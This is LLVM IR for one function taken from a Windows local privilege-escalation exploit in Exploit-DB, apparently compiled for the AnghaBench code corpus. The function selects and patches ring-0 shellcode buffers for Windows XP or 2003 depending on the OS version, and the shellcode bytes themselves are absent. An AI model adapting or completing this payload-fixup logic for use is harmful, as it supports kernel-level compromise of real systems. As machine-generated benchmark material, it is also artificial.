; ModuleID = '/home/carl/AnghaBench/exploitdb/exploits/windows/local/extr_5143.c_fixup_ring0_shell.c'
source_filename = "/home/carl/AnghaBench/exploitdb/exploits/windows/local/extr_5143.c_fixup_ring0_shell.c"
target datalayout = "e-m:e-p270:32:32-p271:32:32-p272:64:64-i64:64-f80:128-n8:16:32:64-S128"
target triple = "x86_64-unknown-linux-gnu"

@stderr = common dso_local global i32 0, align 4
@.str = private unnamed_addr constant [35 x i8] c"* GetVersion, unsupported version\0A\00", align 1
@EXIT_FAILURE = common dso_local global i32 0, align 4
@win32_fixup = common dso_local global i32* null, align 8
@win32_ret = common dso_local global i32* null, align 8
@winxp_ring0_shell = common dso_local global i32* null, align 8
@win2k3_ring0_shell = common dso_local global i32* null, align 8
@llvm.used = appending global [1 x i8*] [i8* bitcast (i32* (i64, i32, i32*)* @fixup_ring0_shell to i8*)], section "llvm.metadata"

; Function Attrs: noinline nounwind optnone uwtable
define internal i32* @fixup_ring0_shell(i64 %0, i32 %1, i32* %2) #0 {
  %4 = alloca i32*, align 8
  %5 = alloca i64, align 8
  %6 = alloca i32, align 4
  %7 = alloca i32*, align 8
  %8 = alloca i32, align 4
  %9 = alloca i32, align 4
  %10 = alloca i32, align 4
  store i64 %0, i64* %5, align 8
  store i32 %1, i32* %6, align 4
  store i32* %2, i32** %7, align 8
  %11 = call i32 (...) @GetVersion()
  store i32 %11, i32* %8, align 4
  %12 = load i32, i32* %8, align 4
  %13 = call i32 @LOWORD(i32 %12)
  %14 = call i64 @LOBYTE(i32 %13)
  %15 = trunc i64 %14 to i32
  store i32 %15, i32* %9, align 4
  %16 = load i32, i32* %8, align 4
  %17 = call i32 @LOWORD(i32 %16)
  %18 = call i64 @HIBYTE(i32 %17)
  %19 = trunc i64 %18 to i32
  store i32 %19, i32* %10, align 4
  %20 = load i32, i32* %9, align 4
  %21 = icmp ne i32 %20, 5
  br i1 %21, label %22, label %27

22:                                               ; preds = %3
  %23 = load i32, i32* @stderr, align 4
  %24 = call i32 @fprintf(i32 %23, i8* getelementptr inbounds ([35 x i8], [35 x i8]* @.str, i64 0, i64 0))
  %25 = load i32, i32* @EXIT_FAILURE, align 4
  %26 = call i32 @exit(i32 %25) #3
  unreachable

27:                                               ; preds = %3
  %28 = load i64, i64* %5, align 8
  %29 = trunc i64 %28 to i32
  %30 = load i32*, i32** @win32_fixup, align 8
  %31 = getelementptr inbounds i32, i32* %30, i64 5
  %32 = load i32, i32* %31, align 4
  %33 = add nsw i32 %32, %29
  store i32 %33, i32* %31, align 4
  %34 = load i64, i64* %5, align 8
  %35 = trunc i64 %34 to i32
  %36 = load i32*, i32** @win32_fixup, align 8
  %37 = getelementptr inbounds i32, i32* %36, i64 22
  %38 = load i32, i32* %37, align 4
  %39 = add nsw i32 %38, %35
  store i32 %39, i32* %37, align 4
  %40 = load i64, i64* %5, align 8
  %41 = trunc i64 %40 to i32
  %42 = load i32*, i32** @win32_fixup, align 8
  %43 = getelementptr inbounds i32, i32* %42, i64 26
  %44 = load i32, i32* %43, align 4
  %45 = add nsw i32 %44, %41
  store i32 %45, i32* %43, align 4
  %46 = load i64, i64* %5, align 8
  %47 = trunc i64 %46 to i32
  %48 = load i32*, i32** @win32_fixup, align 8
  %49 = getelementptr inbounds i32, i32* %48, i64 30
  %50 = load i32, i32* %49, align 4
  %51 = add nsw i32 %50, %47
  store i32 %51, i32* %49, align 4
  %52 = load i64, i64* %5, align 8
  %53 = trunc i64 %52 to i32
  %54 = load i32*, i32** @win32_fixup, align 8
  %55 = getelementptr inbounds i32, i32* %54, i64 34
  %56 = load i32, i32* %55, align 4
  %57 = add nsw i32 %56, %53
  store i32 %57, i32* %55, align 4
  %58 = load i64, i64* %5, align 8
  %59 = trunc i64 %58 to i32
  %60 = load i32*, i32** @win32_ret, align 8
  %61 = getelementptr inbounds i32, i32* %60, i64 4
  %62 = load i32, i32* %61, align 4
  %63 = add nsw i32 %62, %59
  store i32 %63, i32* %61, align 4
  %64 = load i32, i32* %10, align 4
  switch i32 %64, label %77 [
    i32 1, label %65
    i32 2, label %71
  ]

65:                                               ; preds = %27
  %66 = load i32*, i32** %7, align 8
  store i32 7, i32* %66, align 4
  %67 = load i32, i32* %6, align 4
  %68 = load i32*, i32** @winxp_ring0_shell, align 8
  %69 = getelementptr inbounds i32, i32* %68, i64 55
  store i32 %67, i32* %69, align 4
  %70 = load i32*, i32** @winxp_ring0_shell, align 8
  store i32* %70, i32** %4, align 8
  br label %82

71:                                               ; preds = %27
  %72 = load i32*, i32** %7, align 8
  store i32 7, i32* %72, align 4
  %73 = load i32, i32* %6, align 4
  %74 = load i32*, i32** @win2k3_ring0_shell, align 8
  %75 = getelementptr inbounds i32, i32* %74, i64 58
  store i32 %73, i32* %75, align 4
  %76 = load i32*, i32** @win2k3_ring0_shell, align 8
  store i32* %76, i32** %4, align 8
  br label %82

77:                                               ; preds = %27
  %78 = load i32, i32* @stderr, align 4
  %79 = call i32 @fprintf(i32 %78, i8* getelementptr inbounds ([35 x i8], [35 x i8]* @.str, i64 0, i64 0))
  %80 = load i32, i32* @EXIT_FAILURE, align 4
  %81 = call i32 @exit(i32 %80) #3
  unreachable

82:                                               ; preds = %71, %65
  %83 = load i32*, i32** %4, align 8
  ret i32* %83
}

declare dso_local i32 @GetVersion(...) #1

declare dso_local i64 @LOBYTE(i32) #1

declare dso_local i32 @LOWORD(i32) #1

declare dso_local i64 @HIBYTE(i32) #1

declare dso_local i32 @fprintf(i32, i8*) #1

; Function Attrs: noreturn
declare dso_local i32 @exit(i32) #2


!llvm.module.flags = !{!0}
!llvm.ident = !{!1}

!0 = !{i32 1, !"wchar_size", i32 4}
!1 = !{!"clang version 10.0.1 (https://github.com/wsmoses/llvm-project-tok c8e5003577614e72d6d18a216e6a09771e1fcce4)"}
